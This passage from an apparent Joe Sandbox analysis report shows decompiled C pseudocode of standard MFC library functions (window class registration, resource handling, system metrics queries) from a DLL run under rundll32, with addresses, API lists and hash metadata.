                                                                                                        				intOrPtr _v52;
                                                                                                        				signed int _v56;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t122;
                                                                                                        				void* _t128;
                                                                                                        				intOrPtr _t130;
                                                                                                        				signed int _t139;
                                                                                                        				signed int _t144;
                                                                                                        				signed int _t175;
                                                                                                        				signed int _t177;
                                                                                                        				signed int _t179;
                                                                                                        				signed int _t181;
                                                                                                        				signed int _t183;
                                                                                                        				signed int _t187;
                                                                                                        				void* _t190;
                                                                                                        				intOrPtr _t191;
                                                                                                        				signed int _t201;
                                                                                                        
                                                                                                        				_t190 = __ecx;
                                                                                                        				_t122 = E1000AB19(__ebx, __edi, __esi, __eflags);
                                                                                                        				_v8 = _t122;
                                                                                                        				_t3 =  &_a4;
                                                                                                        				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                        				if( *_t3 == 0) {
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        				_push(__ebx);
                                                                                                        				_push(__esi);
                                                                                                        				_push(__edi);
                                                                                                        				_t201 = 0;
                                                                                                        				E1003E9B0(0,  &_v56, 0, 0x28);
                                                                                                        				_v52 = DefWindowProcA;
                                                                                                        				_t128 = E1000AB19(__ebx, 0, 0, __eflags);
                                                                                                        				__eflags = _a4 & 0x00000001;
                                                                                                        				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                        				_t130 =  *0x10099150; // 0x10003
                                                                                                        				_t187 = 8;
                                                                                                        				_v32 = _t130;
                                                                                                        				_v16 = _t187;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_push( &_v56);
                                                                                                        					_v56 = 0xb;
                                                                                                        					_v20 = "AfxWnd80s";
                                                                                                        					_t183 = E10010F23(_t187, _t190, 0, 0, __eflags);
                                                                                                        					__eflags = _t183;
                                                                                                        					if(_t183 != 0) {
                                                                                                        						_t201 = 1;
                                                                                                        						__eflags = 1;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000020;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = _v56 | 0x0000008b;
                                                                                                        					_push( &_v56);
                                                                                                        					_v20 = "AfxOleControl80s";
                                                                                                        					_t181 = E10010F23(_t187, _t190, 0, _t201, __eflags);
                                                                                                        					__eflags = _t181;
                                                                                                        					if(_t181 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000020;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000002;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_push( &_v56);
                                                                                                        					_v56 = 0;
                                                                                                        					_v20 = "AfxControlBar80s";
                                                                                                        					_v28 = 0x10;
                                                                                                        					_t179 = E10010F23(_t187, _t190, 0, _t201, __eflags);
                                                                                                        					__eflags = _t179;
                                                                                                        					if(_t179 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000002;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000004;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = _t187;
                                                                                                        					_v28 = 0;
                                                                                                        					_t177 = E100111C9(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                        					__eflags = _t177;
                                                                                                        					if(_t177 != 0) {
                                                                                                        						_t201 = _t201 | 0x00000004;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & _t187;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v56 = 0xb;
                                                                                                        					_v28 = 6;
                                                                                                        					_t175 = E100111C9(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                        					__eflags = _t175;
                                                                                                        					if(_t175 != 0) {
                                                                                                        						_t201 = _t201 | _t187;
                                                                                                        						__eflags = _t201;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000010;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0xff;
                                                                                                        					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                        					_t48 =  &_a4;
                                                                                                        					 *_t48 = _a4 & 0xffffc03f;
                                                                                                        					__eflags =  *_t48;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000040;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x10;
                                                                                                        					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000080;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 2;
                                                                                                        					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000100;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = _t187;
                                                                                                        					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000200;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x20;
                                                                                                        					_t201 = _t201 | E1000EC9E(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000400;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 1;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00000800;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x40;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00001000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 4;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00002000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x80;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00004000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x800;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00008000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x400;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00010000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x200;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00020000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x100;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				__eflags = _a4 & 0x00040000;
                                                                                                        				if(__eflags != 0) {
                                                                                                        					_v12 = 0x8000;
                                                                                                        					_t201 = _t201 | E1000EC9E(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				_t191 = _v8;
                                                                                                        				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                        				_t139 =  *(_t191 + 0x18);
                                                                                                        				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                        				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                        					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                        					_t201 = _t201 | 0x00000010;
                                                                                                        					__eflags = _t201;
                                                                                                        				}
                                                                                                        				asm("sbb eax, eax");
                                                                                                        				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                        				__eflags = _t144;
                                                                                                        				return _t144;
                                                                                                        			}



























                                                                                                        0x100112a0
                                                                                                        0x100112a2
                                                                                                        0x100112a4
                                                                                                        0x100112a4
                                                                                                        0x100112a4
                                                                                                        0x100112a2
                                                                                                        0x100112a7
                                                                                                        0x100112ab
                                                                                                        0x100112b0
                                                                                                        0x100112b1
                                                                                                        0x100112b4
                                                                                                        0x100112bb
                                                                                                        0x100112c2
                                                                                                        0x100112c7
                                                                                                        0x100112c9
                                                                                                        0x100112cb
                                                                                                        0x100112cb
                                                                                                        0x100112cb
                                                                                                        0x100112c9
                                                                                                        0x100112ce
                                                                                                        0x100112d2
                                                                                                        0x100112e2
                                                                                                        0x100112e5
                                                                                                        0x100112e8
                                                                                                        0x100112ed
                                                                                                        0x100112ef
                                                                                                        0x100112f1
                                                                                                        0x100112f1
                                                                                                        0x100112f1
                                                                                                        0x100112ef
                                                                                                        0x100112f4
                                                                                                        0x100112f7
                                                                                                        0x10011307
                                                                                                        0x1001130e
                                                                                                        0x10011315
                                                                                                        0x1001131a
                                                                                                        0x1001131c
                                                                                                        0x1001131e
                                                                                                        0x1001131e
                                                                                                        0x1001131e
                                                                                                        0x1001131c
                                                                                                        0x10011320
                                                                                                        0x10011324
                                                                                                        0x1001132f
                                                                                                        0x1001133b
                                                                                                        0x1001133d
                                                                                                        0x1001133d
                                                                                                        0x1001133d
                                                                                                        0x1001133d
                                                                                                        0x10011344
                                                                                                        0x10011348
                                                                                                        0x10011350
                                                                                                        0x1001135c
                                                                                                        0x1001135c
                                                                                                        0x1001135c
                                                                                                        0x1001135e
                                                                                                        0x10011362
                                                                                                        0x1001136d
                                                                                                        0x10011379
                                                                                                        0x10011379
                                                                                                        0x10011379
                                                                                                        0x10011380
                                                                                                        0x10011383
                                                                                                        0x1001138a
                                                                                                        0x10011392
                                                                                                        0x10011392
                                                                                                        0x10011392
                                                                                                        0x10011399
                                                                                                        0x1001139c
                                                                                                        0x100113a3
                                                                                                        0x100113af
                                                                                                        0x100113af
                                                                                                        0x100113af
                                                                                                        0x100113b6
                                                                                                        0x100113b9
                                                                                                        0x100113c0
                                                                                                        0x100113cc
                                                                                                        0x100113cc
                                                                                                        0x100113cc
                                                                                                        0x100113d3
                                                                                                        0x100113d6
                                                                                                        0x100113dd
                                                                                                        0x100113e9
                                                                                                        0x100113e9
                                                                                                        0x100113e9
                                                                                                        0x100113f0
                                                                                                        0x100113f3
                                                                                                        0x100113fa
                                                                                                        0x10011406
                                                                                                        0x10011406
                                                                                                        0x10011406
                                                                                                        0x1001140d
                                                                                                        0x10011410
                                                                                                        0x10011417
                                                                                                        0x10011423
                                                                                                        0x10011423
                                                                                                        0x10011423
                                                                                                        0x1001142a
                                                                                                        0x1001142d
                                                                                                        0x10011434
                                                                                                        0x1001143c
                                                                                                        0x1001143c
                                                                                                        0x1001143c
                                                                                                        0x10011443
                                                                                                        0x10011446
                                                                                                        0x1001144d
                                                                                                        0x10011455
                                                                                                        0x10011455
                                                                                                        0x10011455
                                                                                                        0x1001145c
                                                                                                        0x1001145f
                                                                                                        0x10011466
                                                                                                        0x10011472
                                                                                                        0x10011472
                                                                                                        0x10011472
                                                                                                        0x10011479
                                                                                                        0x1001147c
                                                                                                        0x10011483
                                                                                                        0x1001148f
                                                                                                        0x1001148f
                                                                                                        0x1001148f
                                                                                                        0x10011496
                                                                                                        0x10011499
                                                                                                        0x100114a0
                                                                                                        0x100114a8
                                                                                                        0x100114a8
                                                                                                        0x100114a8
                                                                                                        0x100114aa
                                                                                                        0x100114ad
                                                                                                        0x100114b0
                                                                                                        0x100114bc
                                                                                                        0x100114be
                                                                                                        0x100114c3
                                                                                                        0x100114c6
                                                                                                        0x100114c6
                                                                                                        0x100114c6
                                                                                                        0x100114d5
                                                                                                        0x100114d7
                                                                                                        0x100114d7
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                        • API String ID: 2102423945-4122032997
                                                                                                        • Opcode ID: 8f64765f4ea5e021c2d5c4cf4142c5c1eb15a9e856689c24899df13a9e25d18e
                                                                                                        • Instruction ID: 9d9e82e634741a53376d69eea13adabe477dfa4101b55a4275f28d8d6693f8b7
                                                                                                        • Opcode Fuzzy Hash: 8f64765f4ea5e021c2d5c4cf4142c5c1eb15a9e856689c24899df13a9e25d18e
                                                                                                        • Instruction Fuzzy Hash: A3814EB5D00249AEEB50CFA4C585BDEBFF8EF04384F118165F948EA185E774DA85CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002A904(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				short _v72;
                                                                                                        				char* _v76;
                                                                                                        				signed int _v80;
                                                                                                        				signed int* _v84;
                                                                                                        				signed int _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t54;
                                                                                                        				void* _t66;
                                                                                                        				short* _t70;
                                                                                                        				signed int _t72;
                                                                                                        				signed int _t81;
                                                                                                        				signed int* _t83;
                                                                                                        				short* _t84;
                                                                                                        				void* _t91;
                                                                                                        				signed int* _t98;
                                                                                                        				signed int _t99;
                                                                                                        				void** _t100;
                                                                                                        				intOrPtr _t102;
                                                                                                        				signed int _t104;
                                                                                                        				signed int _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t101 = __esi;
                                                                                                        				_t97 = __edx;
                                                                                                        				_t82 = __ebx;
                                                                                                        				_t54 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t54 ^ _t106;
                                                                                                        				_t100 = __ecx;
                                                                                                        				_v76 = _a4;
                                                                                                        				if(__ecx[1] != 0) {
                                                                                                        					_push(__ebx);
                                                                                                        					_push(__esi);
                                                                                                        					_t83 = GlobalLock( *__ecx);
                                                                                                        					_v84 = _t83;
                                                                                                        					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                        					_v80 = E1002A766(_t83);
                                                                                                        					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                        					_v92 = _t102;
                                                                                                        					if(_v88 == 0) {
                                                                                                        						 *_t83 =  *_t83 | 0x00000040;
                                                                                                        					} else {
                                                                                                        						_t83[3] = _t83[3] | 0x00000040;
                                                                                                        					}
                                                                                                        					if(lstrlenA(_v76) >= 0x20) {
                                                                                                        						L15:
                                                                                                        						_t66 = 0;
                                                                                                        					} else {
                                                                                                        						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                        						_v76 = _t97;
                                                                                                        						if(_t97 < _t102) {
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							_t70 = E1002A791(_t83);
                                                                                                        							_t91 = 0;
                                                                                                        							_t84 = _t70;
                                                                                                        							if(_v80 != 0) {
                                                                                                        								_t81 = E1003EFB4(_t84 + _t102);
                                                                                                        								_t97 = _v76;
                                                                                                        								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                        							}
                                                                                                        							_t33 = _t97 + 3; // 0x3
                                                                                                        							_t98 = _v84;
                                                                                                        							_t36 = _t84 + 3; // 0x10002
                                                                                                        							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                        							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                        							_v80 = _t72;
                                                                                                        							if(_v88 == 0) {
                                                                                                        								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                        							} else {
                                                                                                        								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                        							}
                                                                                                        							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                        								L17:
                                                                                                        								 *_t84 = _a8;
                                                                                                        								_t97 =  &_v72;
                                                                                                        								E10021BC1(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                        								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                        								GlobalUnlock( *_t100);
                                                                                                        								_t100[2] = _t100[2] & 0x00000000;
                                                                                                        								_t66 = 1;
                                                                                                        							} else {
                                                                                                        								_t97 = _t100[1];
                                                                                                        								_t95 = _t97 - _t72 + _v84;
                                                                                                        								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                        									E10021BC1(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                        									_t107 = _t107 + 0x10;
                                                                                                        									goto L17;
                                                                                                        								} else {
                                                                                                        									goto L15;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_pop(_t101);
                                                                                                        					_pop(_t82);
                                                                                                        				} else {
                                                                                                        					_t66 = 0;
                                                                                                        				}
                                                                                                        				return E10039F21(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 1002A92E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1002A976
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002A990
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                        • String ID: System
                                                                                                        • API String ID: 1529587224-3470857405
                                                                                                        • Opcode ID: f57b6397f0c9c0c82a1a830af608b2ea2e7b35a2686c53ef3b4d01f9902342bc
                                                                                                        • Instruction ID: cd77923ceb2e7a963411e42cde1db47b375c643ded8c900d885fb5f9c10a57db
                                                                                                        • Opcode Fuzzy Hash: f57b6397f0c9c0c82a1a830af608b2ea2e7b35a2686c53ef3b4d01f9902342bc
                                                                                                        • Instruction Fuzzy Hash: 2C41C271900215DFDB04DFB4CD85A9EBBB5FF05314F65822AE812EB185EB70A985CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10014454(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				int _t31;
                                                                                                        				void* _t37;
                                                                                                        				void* _t41;
                                                                                                        				intOrPtr* _t43;
                                                                                                        				void* _t44;
                                                                                                        				int _t45;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				void* _t49;
                                                                                                        
                                                                                                        				_t42 = __ecx;
                                                                                                        				_t48 = __ecx;
                                                                                                        				_t41 = E1000F039(__ecx);
                                                                                                        				_t50 = _t41;
                                                                                                        				if(_t41 == 0) {
                                                                                                        					E1000836F(_t41, _t42, _t44, _t48, _t50);
                                                                                                        				}
                                                                                                        				_t43 =  *((intOrPtr*)(_t48 + 0x80));
                                                                                                        				_t45 = _a4;
                                                                                                        				if(_t43 == 0) {
                                                                                                        					L4:
                                                                                                        					if(_a8 != 0xffff) {
                                                                                                        						__eflags = _t45;
                                                                                                        						if(_t45 == 0) {
                                                                                                        							L17:
                                                                                                        							_t22 = _t48 + 0xa8;
                                                                                                        							 *_t22 =  *(_t48 + 0xa8) & 0x00000000;
                                                                                                        							__eflags =  *_t22;
                                                                                                        							L18:
                                                                                                        							_t24 = _t41 + 0x3c;
                                                                                                        							 *_t24 =  *(_t41 + 0x3c) | 0x00000040;
                                                                                                        							__eflags =  *_t24;
                                                                                                        							L19:
                                                                                                        							_t31 =  *(_t48 + 0xa8);
                                                                                                        							if(_t31 ==  *((intOrPtr*)(_t48 + 0xac))) {
                                                                                                        								goto L22;
                                                                                                        							}
                                                                                                        							_t31 = E1000E5E5(_t41, _t43, _t49, GetParent( *(_t48 + 0x20)));
                                                                                                        							if(_t31 == 0) {
                                                                                                        								goto L22;
                                                                                                        							}
                                                                                                        							return PostMessageA( *(_t48 + 0x20), 0x36a, 0, 0);
                                                                                                        						}
                                                                                                        						__eflags = _a8 & 0x00000810;
                                                                                                        						if((_a8 & 0x00000810) != 0) {
                                                                                                        							goto L17;
                                                                                                        						}
                                                                                                        						__eflags = _t45 - 0xf000 - 0x1ef;
                                                                                                        						if(_t45 - 0xf000 > 0x1ef) {
                                                                                                        							__eflags = _t45 - 0xff00;
                                                                                                        							if(_t45 < 0xff00) {
                                                                                                        								L14:
                                                                                                        								 *(_t48 + 0xa8) = _t45;
                                                                                                        								goto L18;
                                                                                                        							}
                                                                                                        							 *(_t48 + 0xa8) = 0xef1f;
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_t45 = (_t45 + 0xffff1000 >> 4) + 0xef00;
                                                                                                        						__eflags = _t45;
                                                                                                        						goto L14;
                                                                                                        					}
                                                                                                        					 *(_t48 + 0x3c) =  *(_t48 + 0x3c) & 0xffffffbf;
                                                                                                        					if( *((intOrPtr*)(_t41 + 0x68)) != 0) {
                                                                                                        						 *(_t48 + 0xa8) = 0xe002;
                                                                                                        					} else {
                                                                                                        						 *(_t48 + 0xa8) = 0xe001;
                                                                                                        					}
                                                                                                        					SendMessageA( *(_t48 + 0x20), 0x362,  *(_t48 + 0xa8), 0);
                                                                                                        					_t43 = _t48;
                                                                                                        					_t37 =  *((intOrPtr*)( *_t48 + 0x154))();
                                                                                                        					if(_t37 != 0) {
                                                                                                        						UpdateWindow( *(_t37 + 0x20));
                                                                                                        					}
                                                                                                        					goto L19;
                                                                                                        				} else {
                                                                                                        					_t31 =  *((intOrPtr*)( *_t43 + 0x7c))(_t45, _a8, _a12);
                                                                                                        					if(_t31 != 0) {
                                                                                                        						L22:
                                                                                                        						return _t31;
                                                                                                        					}
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        			}

                                                                                                        0x100144a0
                                                                                                        0x100144a0
                                                                                                        0x100144c6
                                                                                                        0x100144ce
                                                                                                        0x100144d0
                                                                                                        0x100144d8
                                                                                                        0x100144dd
                                                                                                        0x100144dd
                                                                                                        0x00000000
                                                                                                        0x10014479
                                                                                                        0x10014482
                                                                                                        0x10014487
                                                                                                        0x1001456b
                                                                                                        0x1001456b
                                                                                                        0x1001456b
                                                                                                        0x00000000
                                                                                                        0x10014487

                                                                                                        APIs
                                                                                                        • SendMessageA.USER32 ref: 100144C6
                                                                                                        • UpdateWindow.USER32(?), ref: 100144DD
                                                                                                        • GetParent.USER32(?), ref: 10014545
                                                                                                        • PostMessageA.USER32 ref: 10014561
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                                                                                                        • String ID: @
                                                                                                        • API String ID: 33412044-2766056989
                                                                                                        • Opcode ID: 0b902b0e72b624e88f2f3497a87a663efd8a5c83ce47bfd92255e69267417edc
                                                                                                        • Instruction ID: b9ccb1bd8257d746b9c99fcf4ecbea94a89f455cc43f1eb0e785a61d3ba83f4b
                                                                                                        • Opcode Fuzzy Hash: 0b902b0e72b624e88f2f3497a87a663efd8a5c83ce47bfd92255e69267417edc
                                                                                                        • Instruction Fuzzy Hash: C4319371200B01EFE760CF60CC48B5A77E6FF41795F228429F9999A2B2DF71E9849B01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E1000BDA7(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                        				void _v20;
                                                                                                        				int _t14;
                                                                                                        				int _t18;
                                                                                                        				intOrPtr* _t23;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				if(E1000BBFB() == 0) {
                                                                                                        					if(_a4 != 0x12340042) {
                                                                                                        						L9:
                                                                                                        						_t14 = 0;
                                                                                                        						L10:
                                                                                                        						return _t14;
                                                                                                        					}
                                                                                                        					_t23 = _a8;
                                                                                                        					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                        						goto L9;
                                                                                                        					} else {
                                                                                                        						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                        						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                        						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                        						_t18 = GetSystemMetrics(1);
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						 *(_t23 + 0x10) = _t18;
                                                                                                        						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                        						if( *_t23 >= 0x48) {
                                                                                                        							E1003F29A(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                        						}
                                                                                                        						_t14 = 1;
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return  *0x10098d20(_a4, _a8);
                                                                                                        			}









                                                                                                        APIs
                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 1000BDE5
                                                                                                        • GetSystemMetrics.USER32 ref: 1000BDFD
                                                                                                        • GetSystemMetrics.USER32 ref: 1000BE04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$Metrics$InfoParameters
                                                                                                        • String ID: B$DISPLAY
                                                                                                        • API String ID: 3136151823-3316187204
                                                                                                        • Opcode ID: b73773b73f2ef2c7aef0ed6eda5f1c8f277f0df2141217e252145798cdc9dc59
